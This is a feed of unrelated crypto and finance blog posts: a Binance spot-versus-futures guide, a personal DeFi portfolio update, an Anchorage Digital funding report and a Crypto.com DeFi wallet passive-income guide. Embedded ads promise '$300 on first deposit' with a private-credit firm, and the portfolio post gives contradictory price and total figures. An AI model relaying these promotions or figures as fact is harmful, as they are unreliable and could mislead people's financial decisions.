The result is not just PCI DSS 4.0.1 compliance, but a stronger, resilient cardholder data environment you can trust. Achieving continuous PCI compliance   requires more than the right VAPT teams and collaboration; it needs vision and coherent approaches for your security posture and systems.

Want to learn more? Check out VISTA InfoSec’s YouTube Channel for simple explanations and expert guidance.

The post PCI DSS Penetration Testing Requirements Explained appeared first on Information Security Consulting Company - VISTA InfoSec.

Smart money doesn’t chase hype — it chooses structure, liquidity, and asymmetric risk. On Binance, that choice usually comes down to one critical decision: Spot trading or Futures trading?

Retail traders often frame this debate as simple — low risk vs high reward. Professionals know it’s far more nuanced. The real question isn’t which market is more profitable, but which market aligns with capital preservation, risk-adjusted returns, and scalable strategy execution.

In this in‑depth guide, we break down Spot vs Futures on Binance from the perspective of institutional traders, hedge funds, high‑net‑worth investors, and disciplined professionals — not gamblers.

By the end, you’ll know exactly where smart money actually trades, why, and how to position yourself accordingly.

Smart money uses both Spot and Futures on Binance — but for different objectives.

• Spot trading is preferred for long‑term accumulation, capital preservation, and directional conviction.
• Futures trading is used for hedging, short‑term alpha, volatility capture, and capital efficiency — not reckless leverage.

The edge comes from knowing when to use each market, not choosing only one.

Smart traders don’t rely on hype — they rely on frameworks. If you want more deep‑dive guides on Binance, crypto risk management, and professional‑grade trading strategies, follow this Medium profile now so you don’t miss the next article.

Understanding Binance Spot Trading

What Is Spot Trading on Binance?

Spot trading on Binance involves buying or selling cryptocurrencies at the current market price, with immediate ownership of the underlying asset. When you buy BTC on the spot market, you actually own BTC — no contracts, no expiry, no liquidation risk.

This is the most straightforward and transparent form of crypto trading, which is why it remains the foundation of most professional portfolios.

Key Features of Binance Spot Markets

• Real ownership of assets
• No leverage required
• No liquidation risk
• Simple fee structure
• Ideal for long‑term holding

Who Uses Spot Trading?

Spot markets attract:

• Long‑term investors
• Funds building core crypto exposure
• Family offices allocating to digital assets
• Traders with strong directional conviction
• Risk‑averse capital seeking asymmetric upside

For smart money, spot trading is about positioning, not excitement.

Advantages of Spot Trading (Why Smart Money Loves It)

1. No Liquidation Risk

One of the biggest advantages of spot trading is zero liquidation risk. Prices can move violently against you, but your position remains intact unless you choose to exit.

This is critical for professionals who prioritize survivability over short‑term performance.

2. Ideal for Long‑Term Conviction Trades

Smart money often identifies structural trends early — Layer 2 adoption, Bitcoin halvings, ETF inflows, DeFi primitives, or real‑world asset tokenization.

Spot markets allow them to:

• Accumulate gradually
• Ride multi‑year trends
• Ignore short‑term volatility

3. Simpler Risk Management

Risk is limited to the capital invested. There are no margin calls, funding rates, or forced liquidations to manage.

This simplicity is a feature, not a weakness.

4. Psychological Advantage

Spot traders experience far less emotional pressure than leveraged traders.

This leads to:

• Better decision‑making
• Less over‑trading
• More consistent execution

Smart money values emotional control as much as strategy.

Limitations of Spot Trading

Despite its strengths, spot trading isn’t perfect.

Capital Inefficiency

To generate meaningful returns, spot traders must deploy significant capital. A 20% move requires 100% capital exposure.

For institutions seeking capital efficiency, this can be a constraint.

Limited Short Opportunities

Spot markets make shorting difficult or impossible without borrowing assets, which adds complexity and counterparty risk.

This is where futures enter the conversation.

Pro Insight: Most traders lose money not because of bad markets — but because they choose the wrong tool.

Are you servicing a high-interest debt or want better savings?

Private credit is becoming the new income solution. Get $300 on first deposit with Insidefinacent. Here’s how it works.

Understanding Binance Futures Trading

What Are Binance Futures?

Binance Futures allows traders to speculate on the price of cryptocurrencies using derivative contracts rather than owning the underlying asset.

Key characteristics include:

• Ability to go long or short
• Use of leverage
• Funding rates
• Liquidation thresholds

Types of Binance Futures

• USDT‑Margined Futures (most popular)
• COIN‑Margined Futures

Smart money overwhelmingly prefers USDT‑margined perpetual futures due to liquidity and simplicity.

Why Smart Money Uses Futures (The Real Reasons)

Contrary to popular belief, professionals do not use futures primarily to gamble with high leverage.

1. Hedging Spot Exposure

One of the most common professional strategies is spot‑futures hedging.

Example:

• Long BTC in spot
• Short BTC perpetual futures during high volatility

This allows smart money to:

• Protect downside risk
• Lock in profits
• Reduce portfolio volatility

2. Capital Efficiency

Futures require far less capital than spot positions. This allows funds to:

• Deploy capital across multiple strategies
• Maintain liquidity
• Optimize returns on equity

3. Short‑Term Alpha Generation

Futures markets are ideal for:

• Range trading
• Breakout strategies
• Mean reversion
• Event‑driven trades

These strategies are difficult to execute efficiently on spot markets.

4. Market Neutral Strategies

Smart money often aims for delta‑neutral returns — profits regardless of market direction.

This is only possible with futures.

Risks of Futures Trading (Why Retail Traders Lose)

Liquidation Risk

Leverage magnifies both gains and losses. Poor risk management leads to forced liquidation — the #1 reason retail traders fail.

Funding Rate Costs

Holding futures positions during crowded trades can result in significant funding payments, silently eroding profits.

Emotional Overload

Leverage amplifies stress, leading to:

• Over‑trading
• Revenge trading
• Strategy abandonment

Smart money survives by avoiding these traps.

Spot vs Futures: Side‑by‑Side Comparison

Want the full smart‑money playbook? This article is part of a series focused on how professionals actually trade crypto — not what influencers sell.

Save this article so you can revisit these frameworks before your next trade.

Where Does Smart Money Actually Trade?

The honest answer: both — but strategically.

Smart Money Playbook

• Spot for core holdings and conviction trades
• Futures for risk management, tactical positioning, and volatility capture

They do not:

• Go all‑in on high leverage
• Trade emotionally
• Chase every move

They focus on risk‑adjusted returns, not screenshots.

Common Retail Mistakes to Avoid

1. Using high leverage without a plan
2. Trading futures without understanding funding rates
3. Ignoring spot accumulation
4. Over‑trading low‑quality setups
5. Confusing luck with skill

Avoiding these mistakes immediately puts you ahead of 90% of traders.

How to Choose Between Spot and Futures

Ask yourself:

• Is my goal long‑term wealth or short‑term income?
• Can I emotionally handle leverage?
• Do I understand liquidation mechanics?
• Am I trading with a strategy or chasing price?

If unsure, start with spot.

Advanced Strategy: Combining Spot and Futures

Professionals often run hybrid strategies, such as:

• Spot accumulation + futures hedging
• Spot long‑term + futures scalping
• Spot portfolio + futures arbitrage

This layered approach reduces risk while maximizing opportunity.

Final Verdict: Spot vs Futures on Binance

Spot trading builds wealth. Futures trading manages and enhances it.

Smart money doesn’t choose sides — it chooses structure, discipline, and survivability.

If your goal is long‑term success rather than short‑term excitement, the path is clear:

• Build conviction in spot markets
• Use futures selectively
• Manage risk relentlessly

That’s where smart money actually trades.

If this guide helped sharpen your understanding of Spot vs Futures on Binance, do clap and save. Your future self will thank you before your next trade.

This isn’t content for gamblers.

It’s for traders who want to stay in the game long enough to win.

Spot vs Futures on Binance: Where Should Smart Money Actually Trade? was originally published in Coinmonks on Medium, where people are continuing the conversation by highlighting and responding to this story.

Termux is an incredibly powerful terminal emulator for Android. I previously showed you how to use it to download any media file, convert files, or ssh into another device. However, that barely scratched the surface. Here are even more awesome things you can do with a terminal window on your phone.

Mixed bag this week in crypto markets: BTC edged down slightly overall (from ~$91k to ~$95.6k ), while altcoins like SUI (+20–31% ) and XRP surged. Your portfolio (BTC, ETH, SUI, AERO, XRP) stayed positive on average, buoyed by SUI/XRP strength amid BTC stability around 95–97k. 📈

📊 Weekly Coin Movements

Portfolio benefited from altcoin rotation away from BTC dominance.

Coin Weekly Change/Volatility Key Swings Note BTC -0.58% to +5% 91k → 97k USD Stable, mild dip ETH -2% to +3% 3.200–3.500 USD Consolidation SUI +20–31% 1.5 → 1.8–2 USD Top winner 🚀 AERO Neutral No big moves Following alt trend XRP +21% → 2.1 USD BTC rotation play

🔍 BTC Technical Analysis (Weekly)

Moderate bullish momentum emerging.

• RSI: 58 (neutral, not overbought).
• MACD: Mild positive histogram (upside potential).
• ADX: 28 (moderate trend strength).
• Trend: Upward above 90k support, rising volatility via Bollinger Bands.

📈 ETH & Altcoin Tech Breakdown

• ETH: RSI 42–45 (neutral/bearish), MACD sell (-111), Directional -16; upside if resistance breaks.
• SUI: Symmetrical triangle, $2 support key for bulls.
• AERO: Neutral indicators.
• XRP: Bullish Bollinger Bands, channel pattern — boosted by SEC ending Ripple appeal.

🌍 Key Global Crypto News

• Altcoins rotating (SUI +20%, TAO +16%); total market cap +$250B.
• SEC drops Ripple appeal — XRP relief rally.
• Canary Capital files for SUI ETF.
• BTC ETF outflows $680M; options expiry adds 90k volatility today.

🪙 Gold as Precious Metal

Gold in bearish correction toward $4,235 support post-ATH, eyeing rally above $5,165. RSI trendline backs upside amid geopolitics fueling long-term bull.

💼 My Portfolio Updates

DeFi portfolio grinding higher with minimal new capital.

• Bitpanda: Up to $1,055 (+$37, no new deposits). Heavy in gold/ETFs. BITPANDA
• VFAT: $847 (+$9), $10 rewards reinvested in ETH pools.
• KRYSTAL: $1,285 (flat), +$6 fees; closed dead position — shifting $90 to Beefy, now $1,195.
• GAMMASWAP: +$5 on Base/Arbitrum ETH volatility plays.
• PENDLE: Minimal gain; stable stake-to-maturity (testing phase).
• MOONWELL: +$30+, better LTV.
• AAVE: +$15, LTV down to 40.08% (safe zone).
• NAVI: Negligible balance/health factor lift.
• TURBOS: Flat, minimal fee rewards.
• CETUS: Flat balance, +$1 rewards (reinvesting); one vault +$20, another -$2, +$2 rewards.
• BEEFY: Core holding — compounding strong.

📊 Portfolio Summary Snapshot

Metric Value Total Value ~$8,550–8,650 USD Concentration BTC-derivs + BTC/USDC CLM Weighted APY ~18–20% annual Yield Sources Uniswap v3 BTC CLM, PancakeSwap vaults, Aerodrome vLP, Morpho/Beefy

Yields stable from fees/compounding.

🔄 Week-over-Week Comparison

Category Last Week Now Change Total Value ~$8,700 $8,927 +$227 (+2.6%) Est. Daily Yield ~$3.7–4.0 ~$3.8 Stable Accrued Yield (Lifetime) ~$1,691 $1,738 +$47 net

Notes: Growth from yields + mild BTC/ETH price lifts. Lower volatility, better range-resilience. Risk down, IL pressure eased. Subjective score: 8.2/10 (up from 7.5).

🧾 Quick Conclusion

Portfolio up ~2.6% in a week, holding steady daily cashflow (~$3.8). APY isn’t sky-high, but structure is mature, less volatile, and sustainable — less action, more results.

🧠 Final Take:

• ❌ No strategy issues.
• ❌ Beefy autocompound flawless.
• ✅ Time + volume will scale it.
• 👉 HODL portfolio: Real fees, controlled risk, gradual growth — no bridging frenzy.
• Daily yield dips? Normal. Healthy structure wins in DeFi. Liquidity outlasts high-APY chasers.

Thoughts on SUI ETF buzz or XRP’s win? Comment below! 👇

⚠️ Disclaimer

🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑

Disclaimer:

This post is just my personal opinion and ideas. I am not promoting or recommending any cryptocurrency or investment. Please do your own research and be careful when investing. Any decisions you make are at your own risk.

🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑🛑

💼 Jan 2026 Portfolio Update: Stable 18–20% APY Amid BTC Consolidation was originally published in Coinmonks on Medium, where people are continuing the conversation by highlighting and responding to this story.

Anchorage Digital, a New York–based crypto bank, is moving to raise fresh capital as it prepares to enter public markets. According to Bloomberg, people familiar with the matter say the firm is looking to secure between $200 million and $400 million in new funding.

Anchorage Seeks Major Funding

Reports say the Firm is exploring a $200M–$400 million round to strengthen its business before a possible public listing. The plan would put Anchorage among a small group of crypto-native companies that have tried to list on stock markets after building regulated services for institutions.

The company’s bank affiliate holds a federal charter, a status that gives it a different footing compared with many crypto firms. That federal backing is often cited by investors as a reason Anchorage can offer custody and other services seen as safer by big clients.

Based on reports, Anchorage last raised capital in a previous round that valued the business at over $3 billion, and the fresh funding is viewed as a runway toward a public debut.

Anchorage Digital, whose affiliate is the first federally chartered US digital-asset bank, is seeking to raise fresh capital as it explores a potential public listing, according to people with knowledge of the matter https://t.co/6xLNEJN54W

— Bloomberg (@business) January 16, 2026

Regulatory Edge And Product Push

Some reports say the bank is also growing teams tied to stablecoin work and exploring partnerships that would widen its product set for large customers. These moves appear aimed at making the company more attractive to public investors.

Market observers note that crypto firms have been considering public listings more often as regulation clears up in certain areas and as institutional demand for custody and regulated rails grows.

Anchorage’s timing comes while other custody and asset firms weigh similar steps, a trend that could reshape how big investors access crypto services. The atmosphere is cautious, but there is clear interest in regulated players.

According to market chatter, the bank could seek a listing as soon as next year, although some coverage says 2027 is also possible. Sources quoted by Bloomberg gave a range of potential timing, and Anchorage has not provided a public comment on the plans.

If Anchorage completes a successful raise and goes public, the event would signal confidence in firms that combine crypto services with bank-style oversight.

Investors will be watching how the company uses the proceeds — whether to build new products, hire staff, or boost its balance sheet ahead of scrutiny that comes with public ownership. The next few months are likely to reveal more details as underwriting and investor talks advance.

Featured image from Yellow, chart from TradingView

What if your crypto could work for you — 24/7 — without relying on banks, brokers, or savings accounts that barely beat inflation?

In a world where traditional interest rates struggle to keep up with rising living costs, decentralized finance (DeFi) has emerged as a powerful alternative for investors seeking passive income, portfolio diversification, and long-term wealth building.

One of the most beginner-friendly yet powerful gateways into this ecosystem is Crypto.com’s DeFi Wallet.

Unlike centralized platforms that control your funds, Crypto.com DeFi Wallet gives you full ownership of your assets, while still offering access to staking, yield farming, liquidity pools, and on-chain rewards — all from a single mobile interface.

In this step-by-step guide, you’ll learn exactly how to use Crypto.com’s DeFi Wallet to generate passive income, even if you’re new to DeFi. We’ll cover setup, security, earning strategies, risk management, and how to maximize yields responsibly.

Whether your goal is earning yield on idle crypto, reducing reliance on traditional debt-based systems, or building decentralized income streams, this guide is designed to help you do it safely and strategically.

What Is Crypto.com’s DeFi Wallet?

Crypto.com’s DeFi Wallet is a non-custodial cryptocurrency wallet that allows users to earn passive income through staking, DeFi lending, liquidity pools, and yield protocols while maintaining full control of their private keys.

Key Features of Crypto.com’s DeFi Wallet

• Self-custody (you own your keys, not Crypto.com)
• Supports Ethereum, Cronos, Polygon, BNB Chain, Cosmos, and more
• Access to staking, DeFi apps (dApps), and yield protocols
• Seamless connection to the Crypto.com App
• Built-in Web3 browser for DeFi access

Unlike centralized platforms, the wallet connects directly to decentralized finance applications (dApps), enabling on-chain rewards without intermediaries.

Building passive income with crypto is a skill — not a gamble.

Follow this publication to learn how professionals use DeFi, staking, and yield strategies to grow income, protect capital, and reduce reliance on traditional banks — without falling for hype or scams.

Can You Earn Passive Income With Crypto.com’s DeFi Wallet?

Yes, Crypto.com’s DeFi Wallet allows users to earn passive income by staking CRO, earning yield on stablecoins, providing liquidity to DeFi pools, and lending crypto assets through decentralized protocols — all while retaining self-custody.

Returns vary based on market conditions and protocol risk.

Why Use a DeFi Wallet for Passive Income?

Traditional savings accounts often offer negative real returns after inflation. DeFi flips this model by allowing users to earn yield directly from blockchain activity.

Benefits of DeFi Passive Income:

• Higher yield potential than banks
• No minimum balances
• Permissionless access
• Global, borderless income streams
• Transparency via smart contracts

Crypto.com’s DeFi Wallet acts as a bridge between beginners and advanced DeFi strategies, making it ideal for investors who want passive income without unnecessary complexity.

Step 1: Download and Set Up Crypto.com’s DeFi Wallet

1. Download the Wallet

• Available on iOS and Android
• Search for “Crypto.com DeFi Wallet”
• Ensure the developer is Crypto.com

2. Create a New Wallet

• Select “Create New Wallet”
• You’ll receive a 12-word recovery phrase
• Write it down offline (never store digitally)

Important Security Note:
Your recovery phrase is your money. Lose it, and your funds are gone forever.

3. Enable Security Settings

• Set a strong passcode
• Enable biometric authentication
• Turn on transaction confirmations

Step 2: Fund Your DeFi Wallet

To earn passive income, you need assets inside your wallet.

Funding Options:

• Transfer crypto from Crypto.com App
• Send crypto from another wallet
• Bridge assets from other chains

Popular assets for passive income:

• CRO
• ETH
• USDC
• ATOM
• MATIC

Each asset offers different yield opportunities, risk levels, and lock-up terms.

Step 3: Understand the Passive Income Options Inside the DeFi Wallet

Crypto.com’s DeFi Wallet supports multiple income-generating strategies, each with different risk-reward profiles.

What Are the Best Passive Income Strategies in Crypto.com’s DeFi Wallet?

The most popular passive income methods include:

• CRO staking
• Stablecoin yield farming
• Liquidity pool participation
• DeFi lending protocols

Each strategy offers different risk levels, yield potential, and liquidity conditions.

Strategy 1: CRO Staking (Beginner-Friendly)

How CRO Staking Works

By staking CRO, you help secure the Cronos network and earn staking rewards in return.

Why CRO Staking Is Popular:

• Predictable yields
• No active management
• On-chain transparency
• Ideal for long-term holders

Step-by-Step CRO Staking:

1. Open DeFi Wallet
2. Select Earn
3. Choose CRO Staking
4. Select a validator
5. Stake your CRO

Typical APYs fluctuate based on network conditions, but CRO staking remains one of the most stable DeFi income options.

Strategy 2: Stablecoin DeFi Yield (Lower Volatility)

If you prefer income without price swings, stablecoins are your friend.

Common Stablecoin Options:

• USDC
• USDT
• DAI

Where Stablecoin Yield Comes From:

• Lending protocols
• Liquidity pools
• Automated market makers (AMMs)

Benefits:

• Reduced volatility
• Predictable yield
• Ideal for capital preservation

This approach is especially attractive for investors focused on debt reduction, cash-flow stability, or income replacement strategies.

Is Stablecoin Yield Safer Than Crypto Staking?

Stablecoin yield strategies are generally less volatile than crypto staking because they are pegged to fiat currencies like the U.S. dollar. However, they still carry smart contract and protocol risk.

Stablecoins are often used for income stability and capital preservation.

Save this guide before you move on.

This step-by-step walkthrough is designed to be reused as you set up your DeFi wallet, choose staking options, and compare yield strategies. Saving now prevents costly mistakes later.

Strategy 3: Liquidity Pools (Higher Yield, Higher Risk)

Liquidity pools allow you to earn:

• Trading fees
• Incentives
• Yield rewards

Example:

Providing CRO/USDC liquidity on Cronos dApps.

Pros:

• Higher APYs
• Multiple income streams

Cons:

• Impermanent loss
• Smart contract risk

This strategy is best for experienced investors who understand DeFi mechanics and risk management.

What Is Impermanent Loss in DeFi?

Impermanent loss occurs when the price of tokens in a liquidity pool changes compared to holding them individually, potentially reducing overall returns despite earning trading fees.

It is a key risk factor when providing liquidity in DeFi protocols.

Strategy 4: DeFi Lending Protocols

Some DeFi platforms allow you to lend your crypto to borrowers and earn interest.

How Lending Generates Income:

• Borrowers pay interest
• Smart contracts automate repayments
• Collateral protects lenders

Ideal Assets:

• Stablecoins
• Blue-chip cryptocurrencies

This method closely resembles traditional interest-based finance, but without banks acting as middlemen.

Step 4: Using the Built-In Web3 Browser

Crypto.com’s DeFi Wallet includes a Web3 browser, giving access to vetted DeFi protocols.

How to Use It:

1. Open DeFi Wallet
2. Tap Browser
3. Select a DeFi app
4. Connect your wallet
5. Review terms before depositing

Always:

• Verify URLs
• Avoid unknown dApps
• Start with small amounts

Is Crypto.com’s DeFi Wallet Safe?

Crypto.com’s DeFi Wallet is considered secure because it is non-custodial, open-source, and requires users to manage their own private keys.

Security ultimately depends on user practices, such as protecting recovery phrases and avoiding unverified DeFi apps.

Step 5: Managing Risk Like a Professional

Passive income doesn’t mean risk-free income.

Smart Risk Management Tips:

• Diversify across strategies
• Avoid chasing unsustainable APYs
• Use stablecoins for balance
• Monitor protocol updates
• Never invest money you can’t afford to lock up

Think of DeFi as a portfolio tool, not a lottery ticket.

Step 6: Tracking and Reinvesting Your Earnings

Best Practices:

• Track yields monthly
• Reinvest rewards strategically
• Convert profits to stablecoins
• Periodically rebalance

Compound interest remains one of the most powerful wealth-building forces — especially in DeFi.

Common Mistakes to Avoid

• Ignoring smart contract risk
• Falling for fake APY promises
• Storing seed phrases digitally
• Over-allocating to one protocol
• Forgetting about gas fees

Avoiding these mistakes alone can dramatically improve long-term returns.

Are you servicing a high-interest debt or have low savings?

Private credit is becoming the new income solution. Get $300 on first deposit with Insidefinacent. See how it works.

Is Crypto.com DeFi Wallet Safe?

Security depends largely on user behavior.

Safety Strengths:

• Non-custodial
• Transparent smart contracts
• Established ecosystem
• Regular updates

Your biggest risk isn’t the wallet — it’s poor operational security.

Who Should Use Crypto.com’s DeFi Wallet?

This wallet is ideal for:

• Passive income seekers
• Crypto beginners entering DeFi
• Long-term CRO holders
• Investors diversifying away from banks
• Individuals rebuilding finances or reducing debt through alternative income

Final Thoughts: Is Crypto.com DeFi Wallet Worth It for Passive Income?

If you’re serious about earning passive income with crypto, Crypto.com’s DeFi Wallet offers a balanced entry point into decentralized finance.

It combines:

• Self-custody
• Real yield opportunities
• Beginner-friendly design
• Access to advanced DeFi strategies

In a financial system increasingly defined by inflation, debt, and centralized control, learning how to generate decentralized income is no longer optional — it’s strategic.

Step-by-Step: How to Use Crypto.com’s DeFi Wallet for Passive Income was originally published in Coinmonks on Medium, where people are continuing the conversation by highlighting and responding to this story.